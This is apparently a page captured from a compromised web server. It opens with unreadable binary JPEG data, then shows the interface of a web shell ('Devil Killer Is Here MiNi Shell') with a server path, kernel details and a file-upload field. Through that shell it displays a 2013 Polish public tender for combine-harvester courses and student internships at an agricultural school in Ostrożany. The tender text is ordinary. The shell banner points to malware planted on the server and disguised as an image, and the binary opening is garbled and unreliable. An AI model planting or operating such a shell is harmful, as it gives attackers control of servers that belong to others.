JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130121/28726-N-2013.html

<p class="kh_header"><b>Drohiczyn: Organizacja i przeprowadzenie zajęć i kursów ukierunkowanych na rozwój wiedzy i umiejętności zawodowych w ramach projektu Profesjonalna edukacja realizowanego przez Zespół Szkół Rolniczych im. W. Witosa w Ostrożanach, w ramach Priorytetu IX PO KL Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</b><br>
<b>Numer ogłoszenia: 28726 - 2013; data zamieszczenia: 21.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Rolniczych , Ostrożany 41, 17-312 Drohiczyn, woj. podlaskie, tel. 85 6551401, faks 85 6551401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zsrostrozany.edupage.org/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka administracji samorządowej/szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie zajęć i kursów ukierunkowanych na rozwój wiedzy i umiejętności zawodowych w ramach projektu Profesjonalna edukacja realizowanego przez Zespół Szkół Rolniczych im. W. Witosa w Ostrożanach, w ramach Priorytetu IX PO KL Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie zajęć i kursów ukierunkowanych na rozwój wiedzy i umiejętności zawodowych w ramach projektu Profesjonalna edukacja realizowanego przez Zespół Szkół Rolniczych im. W. Witosa w Ostrożanach w ramach Priorytetu IX POKL Rozwój wykształcenia i kompetencji w regionach, Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego, tj.: 
1)Organizacja praktyk i staży dla 60 uczestników projektu w tym praktyki - 30 osób i staże - 30 osób. Specjalista do spraw organizacji Praktyk i staży swoją pracę wykonywał będzie w przedziale czasowym kwiecień - lipiec 2013. Łącznie wypracuje 200h przygotowując organizację realizacji praktyk i staży przez uczestników projektu.  
2)Kursu kombajnisty w wymiarze 60 godzin dydaktycznych (1 godzina = 45 min.) dla każdej z dwóch grup (1 grupa = 12 osób) z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika, 
3)Zajęć Eksploatacja agregatu: ciągnik + maszyny rolnicze w wymiarze 60 godzin dydaktycznych (1 godzina = 45 min.) dla każdej z 2 grup (1 grupa = 12 osób) z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wskazać w sposób szczególny - dotyczy wszystkich części zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wskazać w sposób szczególny - dotyczy wszystkich części zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, (przedstawi) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj.:
- co najmniej jedną osobą, posiadającą doświadczenie w pracy w zakresie merytorycznym danej części zamówienia, w szkolnictwie ponadgimnazjalnym zawodowym lub wyższym - min. 3 lata  - dotyczy części pierwszej zamówienia 
- co najmniej jedną osobą posiadającą wykształcenie minimum średnie, ukończony kurs kombajnisty i przeprowadziła co najmniej jeden kurs z zakresu danej części zamówienia - dotyczy części drugiej zamówienia 
- co najmniej jedną osobą, posiadającą doświadczenie, kwalifikacje zawodowe i wykształcenie wyższe z przygotowaniem pedagogicznym w zakresie mechanizacji rolnictwa ewentualnie rolnictwa  bez wskazywania konkretnej specjalności - dotyczy części trzeciej zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wskazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków, przedkłada pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian ustaleń niniejszej umowy w stosunku do treści oferty na podstawie której Wykonawca został wybrany do realizacji umowy w następującym zakresie: 
1.Konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki, w ramach którego realizowane jest zamówienie;
2.Konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej I i II stopnia, w szczególności w zakresie sprawozdawczości;
3 W przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
zmiany organizacji prawnej Wykonawcy, 
uzasadnionej zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia, na inne legitymujące się co najmniej równoważnym doświadczeniem zawodowym, które wymagane było przez Zamawiającego w ogłoszeniu SIWZ, 
zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia. 
Zmiana postanowień umowy, o których mowa w pkt.1 - 3 może nastąpić w okresie obowiązywania umowy, na podstawie uzasadnionego pisemnego wystąpienia jednej ze stron niezwłocznie po zaistnieniu okoliczności powodujących zmianę umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zsrostrozany.edupage.org/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Rolniczych im. W.Witosa w Ostrożanach, Ostrożany 41, 17-312 Drohiczyn..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2013 godzina 09:00, miejsce: Zespół Szkół Rolniczych im. W.Witosa w Ostrożanach, Ostrożany 41, 17-312 Drohiczyn - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt PROFESJONALNA EDUKACJA współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet IX Rozwój wykształcenia i kompetencji w regionach. Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja praktyk i staży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja praktyk i staży dla 60 uczestników projektu w tym praktyki - 30 osób i staże - 30 osób. Wykonawca swoją pracę wykonywał będzie w przedziale czasowym kwiecień - lipiec 2013. Łącznie wypracuje 200h przygotowując organizację praktyk i staży przez uczestników projektu.  
Praktyki i staże mają odbywać się w dni wolne od zajęć lekcyjnych. 
1.1 Obowiązki wykonawcy :  
1) Zorganizowanie praktyk w wymiarze 40h/osobę dla 30 osób (18 uczniów z technikum organizacji usług gastronomicznych i 12 uczniów technikum rolniczego) które będą rozszerzeniem w stosunku do obowiązkowych praktyk realizowanych przez technikum zawodowe na podstawie programu nauczania w danym zawodzie. Rozszerzenie będzie polegać na zwiększonym wymiarze, wzbogaceniu zajęć, zmianie miejsca w stosunku do praktyk realizowanych przez TZ obowiązkowo.  
2). Zorganizowanie staży w wymiarze 150h/osobę dla 30 osób (18 uczniów z technikum organizacji usług gastronomicznych i 12 uczniów technikum rolniczego)Staże czyli nabywanie umiejętności praktycznych, których zakres wykracza poza ramy określone dla praktyki zawodowej. Zadanie zakłada organizację letnich programów stażowych, organizowanych w przedsiębiorstwach, mających na celu praktyczną naukę zawodu. 
3) Prowadzenie karty czasu pracy 
4) Opracowanie autorskiego programu praktyk i staży
5) Podpisanie umów z przedsiębiorcami zapewniającymi praktyki i staże.
6) Zapewnienie właściwych zasad informacyjno-promocyjnych i prowadzenia dokumentacji realizowanych zajęć, zgodnie z obowiązującymi w tym zakresie wytycznymi krajowymi i unijnymi. 
7) Zapoznanie się i przestrzeganie aktów normatywnych Projektu pt. Profesjonalna edukacja 
8) Informowanie uczniów i uczennic przed rozpoczęciem każdych zajęć o źródłach finansowania Projektu. 
9) Współpraca z Zespołem Projektowym; 
10) Przeprowadzenie ankiety na wejściu i na wyjściu przekazanej przez Zespół Projektowy wśród wszystkich uczestników i uczestniczek Projektu. 
11) Przygotowywanie w miarę potrzeb informacji o stanie realizacji zadania. 
12) Sporządzenie raportu z realizacji zajęć po ich zakończeniu. 
13) Systematyczne prowadzenie dokumentacji projektowej, w szczególności: 
a) systematyczne kontrolowanie prowadzenia dzienników praktyk/staży przez uczniów  
b) innej dokumentacji w zależności od potrzeb, 
c) niezwłoczne przekazanie dzienników praktyk/staży do Koordynatora Projektu po ostatecznym zakończeniu zajęć, natomiast dokumentację pozostałą - w okresie rozliczeniowym. 
14) ponoszenie pełnej odpowiedzialność za uczniów i uczennice w czasie trwania praktyk i staży. 
15) podpisanie i wydanie uczestnikom zaświadczeń o ukończeniu praktyk/staży 
1.2 Wydane zaświadczenia i wszystkie dokumenty dotyczące realizacji praktyk i staży muszą zawierać logotypy zgodnie z aktualnymi wytycznymi oraz informację, że projekt jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. 
1.3 Wykonawca po zakończeniu przez uczestników projektu praktyk i staży przedstawi Zamawiającemu następujące dokumenty: 
a.	Sporządzoną listę uczestników z podziałem na praktyki i staże 
b.	Uzupełnione w programy dzienniki praktyk/staży uczestników projektu 
c.	Raport z realizacji zajęć po ich zakończeniu 
d.	Imienny wykaz osób, które ukończyły praktyki/staże, nie ukończyły praktyk/staży 
e.Potwierdzenie przez każdego uczestnika praktyk/staży odebrania zaświadczeń o ukończeniu praktyk/staży.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie Kursu kombajnisty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie Kursu kombajnisty w wymiarze 60 godzin dydaktycznych (1 godzina= 45 min.) dla każdej z dwóch grup każda po 12 osób tz. 24 uczniów i uczennic technikum w Zespole Szkół Rolniczych w Ostrożanach z zapewnieniem materiałów szkoleniowych/dydaktycznych po jednym komplecie dla każdego uczestnika 
Kurs może odbywać się po obowiązkowych zajęciach lekcyjnych i w dni wolne od zajęć lekcyjnych w siedzibie Zamawiającego.  
Zamawiający udostępnia bezpłatnie sale do przeprowadzenia wykładów i zajęć praktycznych.
1. Celem kursu jest przygotowanie uczestników do samodzielnej, bezpiecznej i prawidłowej eksploatacji oraz obsługi technicznej kombajnów zbożowych.
Po ukończeniu kursu uczestnik powinien:
a) rozpoznać i scharakteryzować zespoły kombajnu zbożowego,
b) dobierać odpowiednie parametry pracy kombajnu do poszczególnych gatunków roślin uprawnych i warunków pogodowych panujących podczas zbioru,
c) samodzielnie przeprowadzać regulację, konserwację i podstawową obsługę techniczną podzespołów kombajnu zbożowego,
d) przygotować kombajn do pracy na polu,
e) planować i organizować przebieg prac podczas zbioru,
f) radzić sobie w sytuacjach problemowych,
g) samodzielnie podejmować decyzje,
h) stosować przepisy kodeksu ruchu drogowego dotyczące bezpiecznego zachowywania się na drodze,
i) przestrzegać przepisów bezpieczeństwa i higieny pracy, ochrony przeciwpożarowej, ochrony środowiska,
j) skutecznie komunikować się z innymi uczestnikami procesu pracy,
k) udzielać pomocy przedlekarskiej ofiarom wypadków przy pracy,
l) przygotować kombajn do przechowywania po zakończeniu żniw,
m) korzystać z różnych źródeł informacji technicznej, ekonomicznej oraz doradztwa rolniczego.
2. Rekrutację na kurs przeprowadzi Zamawiający. Wykonawca otrzyma listę uczestników po podpisaniu umowy.
3. Obowiązki Wykonawcy : 
1) Zapewnienie na własny koszt wszystkich elementów związanych z realizacją zamówienia, to jest w szczególności:
1. wykładowców posiadających odpowiednie kwalifikacje do przeprowadzenia kursu, tj. osoby, które posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie umożliwiające realizację kursu stanowiącego przedmiot zamówienia; Kwalifikacje i kompetencje wykładowców powinny być adekwatne do zakresu programowego prowadzonych przez nich bloków tematycznych zajęć.
2. materiałów szkoleniowych/dydaktycznych na własność dla każdego uczestnika kursu (tj. np. kserokopie prezentacji multimedialnych, teczki, płyty CD z materiałami ćwiczeniowymi itp.).,
3. zapewnienie cateringu dla każdego uczestnika kursu, we wszystkie dni zajęć, w tym: 
Obiad:
gorący posiłek (zupa + drugie danie) na początku kursu - w przypadku realizacji godzin w dni po zajęciach obowiązkowych i w trakcie kursu przeprowadzanego w dni wolne od zajęć lekcyjnych . Zestaw obiadowy musi obejmować: zupę i mięso/rybę min 150g, ziemniaki 150g , surówkę lub sałatkę 100g. lub posiłek jarski (min. 400g/porcja) przy czym liczba posiłków jarskich nie może wystąpić więcej niż raz podczas jednego kursu. Obiady powinny być zróżnicowane. Dany obiad nie powinien powtarzać się częściej niż raz na szkolenie. 
woda mineralna 1,5 l/osobę.
Przerwa herbaciana;
po 1 saszetce herbaty czarnej nie mniej niż 2 gramy na osobę,  
drobne ciastka - nie mniej niż 100 g na osobę,
nie mniej niż 0,3 litra soku pomarańczowego lub jabłkowego na osobę.
Ponadto poza wymienionym wyżej asortymentem wykonawca dostarczy: 
termos z gorącą wodą,
cukier,
cytryny do herbaty,
Sposób podania: w formie szwedzkiego stołu z zapewnieniem serwetek, mieszadełek oraz filiżanek, talerzyków w ilości wystarczającej dla obsłużenia każdego uczestnika. Wykonawca zabiera naczynia i resztki poczęstunku najpóźniej 30 min. po zakończeniu kursu. Wykonawca odpowiada za podanie poczęstunku zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i żywienia.
4. zapewnienie zaświadczeń lekarskich do braku przeciwwskazań  udziału w kursie 
5. zapewnienie ubezpieczenia uczestnikom kursu 
6. prowadzenie  zajęć zgodnie z przepisami oraz zasadami bezpieczeństwa i higieny pracy, sprawowanie opieki nad uczestnikami podczas zajęć oraz przerw
7. prowadzenie dziennika zajęć i listy obecności na zajęciach oraz dostarczenie ich do Zamawiającego po zakończeniu kursu dla każdej z grup;
8. bieżące informowanie Zamawiającego o ewentualnych trudnościach na etapie realizacji szkolenia, zakończeniu szkolenia oraz jego wynikach;
9. poddawanie się kontroli prawidłowości realizacji projektu dokonywanej przez Zamawiającego oraz inne uprawnione do tego instytucje, w tym wglądu do wszelkiej dokumentacji związanej z projektem;
10. przekazanie po zakończeniu szkolenia do Zamawiającego kopii protokołów egzaminacyjnych, dokumentów potwierdzających ukończenie szkolenia oraz imiennego wykazu osób, które nie ukończyły szkolenia;
2). Opracowanie autorskiego programu kursu na operatorów kombajnów zbożowych (z podziałem wymiaru godzin teoretycznych i praktycznych przeznaczonych na poszczególne zagadnienia) obejmującego co najmniej poniższe zagadnienia: 
a)  budowa, działania i eksploatacja kombajnów firmy:
-	PRONAR - typ Wektor,
-	Claas, 
-	New Holland, 
-	John Deere 
-	Bizon.
a)	Wiadomości wprowadzające
b)	Budowa i zasady obsługi silników 
c)	Zespół żniwny
d)	Zespół omłotowo - czyszczący 
e)	Budowa i zasada działania układu hydraulicznego i elektronicznego 
f)	Mechanizmy napędowe
g)	Wyposażenie dodatkowe
h)	Obsługa techniczna kombajnów
i)	Organizacja pracy podczas zbioru 
j)	Suszenie i przechowywanie ziarna
k)	Przepisy bhp i p.poż.
l)	Wybrane zagadnienia z przepisów o ruchu drogowym
m)	Technika pracy kombajnem
n)	Nauka jazdy i pracy kombajnem
 4. Sprawdzenie efektywności procesu kształcenia odbędzie się po zakończeniu kursu. Przeprowadzone zostanie w dwóch formach:
a)część teoretyczna - test,
b)część praktyczna - jazda po placu manewrowym, uruchomienie zespołów kombajnu, podczepianie zespołu żniwnego.
Za prawidłową organizację i przebieg egzaminu odpowiedzialna będzie Komisja Egzaminacyjna, powołana przez Wykonawcę. 
5. Certyfikaty potwierdzające nabycie kwalifikacji i Zaświadczenia o ukończeniu kursu wystawi Wykonawca. Warunkiem otrzymania zaświadczenia o ukończeniu kursu dla operatorów kombajnów zbożowych jest uzyskanie pozytywnej oceny zarówno z części teoretycznej, jak i praktycznej i obecność przynajmniej w 80% w całym kursie.
